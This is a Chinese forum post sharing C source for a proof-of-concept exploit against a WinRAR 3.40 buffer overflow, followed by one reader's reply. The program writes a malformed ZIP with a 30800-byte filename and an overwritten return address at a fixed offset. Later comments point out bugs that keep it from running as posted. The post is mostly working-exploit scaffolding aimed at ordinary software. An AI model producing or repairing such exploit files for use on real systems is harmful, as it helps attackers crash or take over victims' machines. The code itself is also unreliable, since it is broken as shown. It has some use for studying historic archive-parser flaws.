WinRAR <= 3.41缓冲区溢出漏洞源程序

    发表于 2004-12-22 10:06:17 | 显示全部楼层 |阅读模式
    /*
    WinRAR 3.40 Buffer Overflow POC
    Thanks to Miguel Tarasco Acuna. He has made a wonderful code for
    Microsoft Windows Vulnerability in Compressed (zipped) Folders (MS04-034)
    which I edited and made this code by.


    Coded by Vafa Khoshaein - [email protected]
    Vulnerability discovery date : December 10, 2004


    Run this code and create vulnerable_zip.zip, then open the file in WinRAR 3.40.
    One file is listed inside the archive; try to delete that file - SECU


    */
    #include <stdio.h>
    #include <windows.h>


    /* Pack the three header structs below with no padding so that their
       in-memory layout is the byte-for-byte on-disk ZIP record layout that
       fwrite() emits at the end of main().  There is no matching pack(pop),
       so the directive applies to the rest of the translation unit. */
    #pragma pack(1)


    /* Bytes stored as the (uncompressed, method 0) entry data, written right
       after the local file header.  NOTE(review): in this forum copy the value
       looks e-mail-obfuscated ("[email protected]"); the sizes hard-coded in
       the headers (0x15) were presumably derived from the original string and
       may not match strlen(DATOS) as shown here - verify before relying on it. */
    #define DATOS "[email protected]"


    /* ZIP local file header (30 bytes when packed).  Field names and order
       follow the PKZIP APPNOTE local-header layout; the DWORD/WORD types come
       from <windows.h>, so this file is Windows-only as written. */
    typedef struct {
    DWORD Signature;           // local file header magic
    WORD VersionNeeded;
    WORD GeneralPurposeFlag;
    WORD CompressionMethod;    // 0 = stored, as used in main()
    WORD ModFileTime;          // DOS time
    WORD ModFileDate;          // DOS date
    DWORD Crc32;
    DWORD CompressedSize;
    DWORD UncompressedSize;
    WORD FilenameLength;       // number of filename bytes that follow the header
    WORD ExtraFieldLength;
    }TOPHEADER;


    /* ZIP central directory file header (46 bytes when packed), one per
       entry; main() writes exactly one.  Signature 0x02014B50 is "PK\1\2". */
    typedef struct {
    DWORD Signature;
    WORD MadeVersion;
    WORD VersionNeeded;
    WORD GeneralPurposeFlag;
    WORD CompressionMethod;
    WORD ModFileTime;
    WORD ModFileDate;
    DWORD Crc32;
    DWORD CompressedSize;
    DWORD UncompressedSize;
    WORD FilenameLength;       // filename bytes following this record (must match
                               // the local header's value for a consistent archive)
    WORD ExtraFieldLength;
    WORD FileCommentLength;
    WORD DiskNumberStart;
    WORD InternalFileAttributes;
    DWORD ExternalFileAttributes;
    DWORD RelativeOffsetOfLocalHeader; // file offset of the matching TOPHEADER
    }MIDDLEHEADER;


    /* ZIP end-of-central-directory record (22 bytes when packed), written
       last.  Signature 0x06054B50 is "PK\5\6"; readers locate the central
       directory from this record, not by scanning local headers. */
    typedef struct {
    DWORD Signature;
    WORD NumOfThisDisk;
    WORD NumDisckStartCentralDirectory;
    WORD NumEntriesCentralDirOnThisDisk;
    WORD TotalNumEntriesCentralDir;
    DWORD SizeCentralDirectory;               // bytes from first MIDDLEHEADER to this record
    DWORD OffsetCentraDirRespectStartDiskNum; // file offset of the first MIDDLEHEADER
    WORD ZipCommentLength;
    }BOTTOMHEADER;


    /*
     * Writes vulnerable_zip.zip in the current directory: a single-entry ZIP
     * whose filename field is 30800 bytes long (far beyond MAX_PATH), which is
     * the condition the post attributes to the WinRAR 3.40 overflow.
     *
     * Layout produced (see the fwrite sequence at the bottom):
     *   TOPHEADER | filename[c] | DATOS | MIDDLEHEADER | filename[c] | BOTTOMHEADER
     *
     * argc/argv are unused.  Returns 1 on success (non-zero), exits with 1 if
     * the output file cannot be opened.  exit()/malloc()/memset()/memcpy() are
     * used without <stdlib.h>/<string.h>; this evidently relies on <windows.h>
     * pulling them in.
     *
     * Defensive note: an archive whose FilenameLength exceeds any sane path
     * length (here 0x7850) is a simple, cheap heuristic for flagging malformed
     * ZIPs at a gateway or in a scanner.
     */
    int main(int argc,char *argv[]) {


    FILE *ZipFile;
    TOPHEADER *Cabecera1;     // local file header
    MIDDLEHEADER *Cabecera2;  // central directory entry
    BOTTOMHEADER *Cabecera3;  // end-of-central-directory record


    DWORD c;                  // filename length in bytes (30800)
    UINT i;
    char *filename;           // heap buffer used as the oversized filename
    char *url;                // unused
    printf("\nWinRAR 3.40 Buffer Overflow POC\n");
    printf("\nCoded by Vafa Khoshaein ([email protected])\n");


    if (!(ZipFile=fopen("vulnerable_zip.zip","w+b"))) {
    printf("\nError in creating vulnerable_zip.zip\n");
    exit(1);
    }


    c=30800;
    filename=(char*)malloc(sizeof(char)*c);   // unchecked: NULL on allocation failure
    // BUG: sizeof(filename) is the size of the pointer (4 or 8), not c, so only
    // the first few bytes of the buffer are zeroed here.
    memset(filename,0,sizeof(filename));


    // BUG: as written this assigns the integer 0x90 to the pointer variable
    // itself, 30800 times over; the buffer contents are never touched and the
    // malloc'd block is leaked.  Every later use of filename (the memcpy and
    // the two fwrite calls) then dereferences address 0x90+offset, which is
    // undefined behavior and will fault.  The program as posted therefore does
    // not produce the archive the header comment describes.
    for( i=0;i<30800;i++) filename=0x90;


    // Return Address
    // The author's note says the four bytes at filename offset 479 are what
    // lands in EIP ("aaaa" == 0x41414141).  Offset is specific to the 3.40
    // build the post targets; not verifiable from this file.
    memcpy(&filename[479],"aaaa",4); /////////// Ret Addr EIP 0x41414141


    // Three packed header records, zero-filled before the fields are set.
    // malloc results are unchecked and the casts are unnecessary in C.
    Cabecera1=(TOPHEADER*)malloc(sizeof(TOPHEADER));
    Cabecera2=(MIDDLEHEADER*)malloc(sizeof(MIDDLEHEADER));
    Cabecera3=(BOTTOMHEADER*)malloc(sizeof(BOTTOMHEADER));
    memset(Cabecera1,0,sizeof(TOPHEADER));
    memset(Cabecera2,0,sizeof(MIDDLEHEADER));
    memset(Cabecera3,0,sizeof(BOTTOMHEADER));


    // ---- local file header ----
    // NOTE(review): 0x00000050 is not the standard "PK\3\4" local-header
    // magic; presumably the targeted parser walks the central directory and
    // does not validate this field - confirm.
    Cabecera1->Signature=0x00000050; // DWORD
    Cabecera1->VersionNeeded=0x000A; // WORD
    Cabecera1->GeneralPurposeFlag=0x0002; // WORD
    Cabecera1->CompressionMethod=0x0000; // WORD  (0 = stored)
    Cabecera1->ModFileTime=0x1362; // WORD
    Cabecera1->ModFileDate=0x3154; // WORD
    Cabecera1->Crc32=0x85B36639; // DWORD  (hard-coded; not computed over DATOS)
    Cabecera1->CompressedSize=0x00000015; // DWORD  (0x15 = 21; see DATOS note)
    Cabecera1->UncompressedSize=0x00000015; // DWORD
    Cabecera1->FilenameLength=(WORD)c; // WORD  c = 30800 = 0x7850 (the "0x0400" in the
                                        // original comment is stale from the MS04-034 code)
    Cabecera1->ExtraFieldLength=0x0000; // WORD
    // ---- central directory entry (mirrors the local header) ----
    Cabecera2->Signature=0x02014B50; // DWORD  "PK\1\2"
    Cabecera2->MadeVersion=0x0014; // WORD
    Cabecera2->VersionNeeded=0x000A; // WORD
    Cabecera2->GeneralPurposeFlag=0x0002; // WORD
    Cabecera2->CompressionMethod=0x0000; // WORD
    Cabecera2->ModFileTime=0x1362; // WORD
    Cabecera2->ModFileDate=0x3154; // WORD
    Cabecera2->Crc32=0x85B36639; // DWORD
    Cabecera2->CompressedSize=0x00000015; // DWORD
    Cabecera2->UncompressedSize=0x00000015; // DWORD
    Cabecera2->FilenameLength=(WORD)c; // WORD  same oversized length as the local header
    Cabecera2->ExtraFieldLength=0x0000; // WORD
    Cabecera2->FileCommentLength=0x0000; // WORD
    Cabecera2->DiskNumberStart=0x0000; // WORD
    Cabecera2->InternalFileAttributes=0x0001; // WORD
    Cabecera2->ExternalFileAttributes=0x00000020; // DWORD
    Cabecera2->RelativeOffsetOfLocalHeader=0x00000000; // DWORD  local header is at file offset 0
    // ---- end of central directory ----
    Cabecera3->Signature=0x06054B50; // DWORD  "PK\5\6"
    Cabecera3->NumOfThisDisk=0x0000; // WORD
    Cabecera3->NumDisckStartCentralDirectory=0x0000; // WORD
    Cabecera3->NumEntriesCentralDirOnThisDisk=0x0001;
    Cabecera3->TotalNumEntriesCentralDir=0x0001;
    // Sizes/offsets are consistent with the write order below:
    // central dir = one MIDDLEHEADER + its c-byte filename,
    // starting after TOPHEADER + c-byte filename + DATOS.
    Cabecera3->SizeCentralDirectory=sizeof(MIDDLEHEADER)+c;
    Cabecera3->OffsetCentraDirRespectStartDiskNum=sizeof(TOPHEADER)+strlen(DATOS)+c;
    Cabecera3->ZipCommentLength=0x0000;


    // Emit the archive.  fwrite return values are not checked, so a short
    // write leaves a truncated file with no diagnostic.
    fwrite(Cabecera1, sizeof(TOPHEADER), 1,ZipFile);

    fwrite(filename, c, 1,ZipFile);
    fwrite(DATOS,strlen(DATOS),1,ZipFile);


    fwrite(Cabecera2, sizeof(MIDDLEHEADER), 1,ZipFile);
    fwrite(filename, c, 1,ZipFile);
    fwrite(Cabecera3, sizeof(BOTTOMHEADER), 1,ZipFile);


    fclose(ZipFile);   // return value unchecked; the heap blocks above are never freed
    printf("\nvulnerable_zip.zip has been created\n\n");
    return 1;          // non-zero exit status even on success
    }

    发表于 2006-4-12 03:34:54 | 显示全部楼层
    我嬲   这个更不懂   看它认得我不   
                我是不认得它的咯    呵呵